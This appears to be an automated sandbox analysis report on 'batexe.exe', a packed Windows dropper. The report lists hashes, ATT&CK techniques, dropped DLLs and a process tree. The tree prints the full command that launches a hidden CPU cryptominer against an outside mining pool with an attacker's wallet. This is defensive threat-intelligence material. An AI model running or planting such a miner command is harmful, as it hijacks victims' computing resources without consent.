73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
299s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
12/02/2024, 05:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1360	b2e.exe
1656	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1656	cpuminer-sse2.exe
1656	cpuminer-sse2.exe
1656	cpuminer-sse2.exe
1656	cpuminer-sse2.exe
1656	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4128-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4128 wrote to memory of 1360	4128	batexe.exe	85
PID 4128 wrote to memory of 1360	4128	batexe.exe	85
PID 4128 wrote to memory of 1360	4128	batexe.exe	85
PID 1360 wrote to memory of 3220	1360	b2e.exe	86
PID 1360 wrote to memory of 3220	1360	b2e.exe	86
PID 1360 wrote to memory of 3220	1360	b2e.exe	86
PID 3220 wrote to memory of 1656	3220	cmd.exe	89
PID 3220 wrote to memory of 1656	3220	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4128
- C:\Users\Admin\AppData\Local\Temp\6FE0.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\6FE0.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6FE0.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7251.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3220
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1656

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6FE0.tmp\b2e.exe

Filesize
2.8MB

MD5
1cd1f1463362e82070bd38c1ad8de2d3

SHA1
02b59eedcca64d1bcdbebabb05228cd292c1fdde

SHA256
80c54200113264848b0a02dfef414bee7e1000ae8db116136fad1a6474d43e29

SHA512
f67290611bf4653411f513f696f93add280763b3da208f3ad6a5c2b171fde413daf0d6e4909a13d93a08eed4946e98332ba40d07e39ba686cf356da9d87c355f

Download Submit
C:\Users\Admin\AppData\Local\Temp\6FE0.tmp\b2e.exe

Filesize
1.1MB

MD5
542933776c1627a02cc19a7c784aa9c1

SHA1
709025bb89ffe9de0ce9101842c1a896a708eb8c

SHA256
4935c9ad873bc0aafd906b5be4fad6b2d15e332cc737a70677fef32455f9aa4e

SHA512
7759564bcc17e235ca5340d60407e58ce74cd73ac92fdc62de7d533aea3576bd779b22ee128ef5940b8cf68630548b6958193d5aaa8d35c0f5c9a1c799993ea9

Download Submit
C:\Users\Admin\AppData\Local\Temp\6FE0.tmp\b2e.exe

Filesize
1.2MB

MD5
191e6397bba158046323bf13ab3423eb

SHA1
cc0059923dbfc0cdab47c22bab42c569bc352a44

SHA256
20403c2f77a09ce03c8fc396ad6b26259d7293bcfc3a93a2b3df0a609e8d6a02

SHA512
66f051939ebbd9d50e93c17e82f8f9ee94dd289ab10af1b91b03384771338bbaa6cfc9b66dc9ee909c233b5d356aba82501d09fc7f06fa1dc1de2a8989933131

Download Submit
C:\Users\Admin\AppData\Local\Temp\7251.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
384KB

MD5
4bd1839bf225ea50badca236f3a67e97

SHA1
c23757e51e155431aca2b33f8e0174c9c341f83f

SHA256
9bead2974a101d69a1245383ecc161f09ace08f88b4dc6ea6aa77181fa561651

SHA512
e5cca32d033293a581b34c0696565cd4bf003ab16106fabf82235ea3bb4920e2c49c0ac1191ad638fa4557e511a016f059866e00e4dd6a0feb3328372c42d9a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
339KB

MD5
e2d98b9a25f72a8a4241bd37afc38b01

SHA1
92ee7248757bd4d501798d6a1af9cc9b826ede32

SHA256
0c3a20b8f5f64d4733920242ca7ce9036ca2dcb306cd08f180a4b9cbd1845f1b

SHA512
4bee758ad3db6159a0c11fd06a4ec8c2cbd9c5d2cc56d36fd8114f3d79b8f121d92701605bc61e7415106e3687ab839748a6b7c2beac41758a7effa0ebd82e0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
202KB

MD5
2ecb477d3c43b28c8897bcfd1896ab4f

SHA1
4e53e7d79495dd2beaa535db3c2964428e844912

SHA256
9ec19e3ad5746f54fc13f9b5eb3c0900c4c92a4f30b220f39cf0fd0588bd5b00

SHA512
bcb2f2ff799d24b346a4666d2f7e5e0c35e41b0183297e7f4cad2e5c74757aaeeff635d939df5574384e4e9c3b4c9f82d03d3cd63ecf35d74ad58805e9615382

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
141KB

MD5
4580a3a3933fcc7b197e948a32a53a0c

SHA1
69a05aa0e12b5b8c165755e0215fb281df4f9c50

SHA256
cb4540b6abc18e389c1a8228fe7db4b804c358339237a53a3001339fb6a3300a

SHA512
18f07c3dda031234ec434943b0f5c1b6a606769105fd9bcddfdfc176f478013c379faae73400522ba986cfe17143b11c740811992b35a0d60119fd12d4128fe6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
359KB

MD5
569516150e76dddaad116bb35f0770d7

SHA1
7db0fb8a2e7348285d5ddf514a063c0534493a90

SHA256
f13539ca2c76d42ec82601453a91838054ef6806a6560ae7d562889c0b1ad2fc

SHA512
57b1a6ecf0a0ea61a019f9a9c9628cf4cfc03f7caa1dc1556e4037d3b4e35263964db4de34f3926cda5ad326bad438521df1d36cb33a8f55fe5d3b7b10b952e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
208KB

MD5
3920984919d6512481f9b6fb9022462d

SHA1
40a9e4ef7e34db005504cba60e9562f873bf36b1

SHA256
af0a57ff2d3642b02c70952ce4c52f5f2ec19860abcde3872f418e13ceb65911

SHA512
eb515238df2e578166bc4ab513dbc77a9a4ff73124f1345513b96214b79f06c66c313cd5c3ab0c589b36e26388d5f540ccc4ef4ee7c76ac54b35b7df3bfbeb5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
283KB

MD5
7adbf54eae13ada62e8a010b4f9bfb6e

SHA1
aadd4411f9d8d379943fdc76efcc7fd0b4b14070

SHA256
7c016704cab9ebbe85508e6477b7bd7c63251b6a3067ccb1c609b5093ad4ff7a

SHA512
f5034d2fc43d03ac507cf368edd614a734b9507135fcac2f0c75cdee7d159c821e9006eabf0af8613ca7117f1b747202990e2048bc72a19df017abba9311f3bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
154KB

MD5
afc82509deadc26231d73e2df47376fc

SHA1
280c2bed57085fc018c10124f6cf7c550a163d8d

SHA256
b15c2f49ef5c648dcf91799a69c249e1e77f0ef87dbba7d841b7cf142052764d

SHA512
c216a8051725109ae4bb82ddf5f0f081e8b47c0a93349356ecbc6f868d409dc8c570ce8d36daae74b6d2d7823ac557984313ddb70ecfb980f2d730accde5345b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
203KB

MD5
f8ca0473847099ec4ee20d0f68be7125

SHA1
8940507d9c86f3877da20f0db5d4c2d51cb458c2

SHA256
df8fdde0d9f34e5b2383e283bf57e53218760bd1c2afa39c2986afa23387ad6a

SHA512
bc8100e4449c811633a64b931362c85ef2bd7d4d8ceaa48cdbbd43da755f24aeff842dece5398a5e28a7348a4444d5877aa70f0f58c9d6b583a133982231e24a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
230KB

MD5
4b128a7c0760b6aa8be7b90d6fa36e72

SHA1
7c9ec51ceee6ce8997bebba6ddd458a72e721fb6

SHA256
344cb26c1643274d52f71a9eea3a58e43bb7638f543adf2f30227105cd23ef77

SHA512
0d112cb7201ccc86a7dc95f010ef05f1fd7af90f0e0568f5328363acd8d0e6e8bb938469236e99fd8f0b161bf3c2c7b957825163f523d3a64c734bff4948023d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
130KB

MD5
f561d4f9db925f839a23b81ce8b18a23

SHA1
cd36a330bd25c965b7a555b34ca48a7bba6ec467

SHA256
0882dd845ba831c752d39c94ced8a9ec61d2e24cd10228ba7966cc4dd9c858af

SHA512
bedf974b103c4689476268832a5b0f654dc3f9c97dba3cf02e1a68db59985e3c894236e64c8a4210df6b043cddf6ef5543ff9708667b37e6a44bab95e09705b7

Download Submit
memory/1360-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1360-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1656-46-0x00000000747F0000-0x0000000074888000-memory.dmp

Filesize
608KB

Download
memory/1656-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1656-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1656-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/1656-44-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1656-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1656-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1656-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1656-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1656-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1656-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1656-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1656-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1656-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4128-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download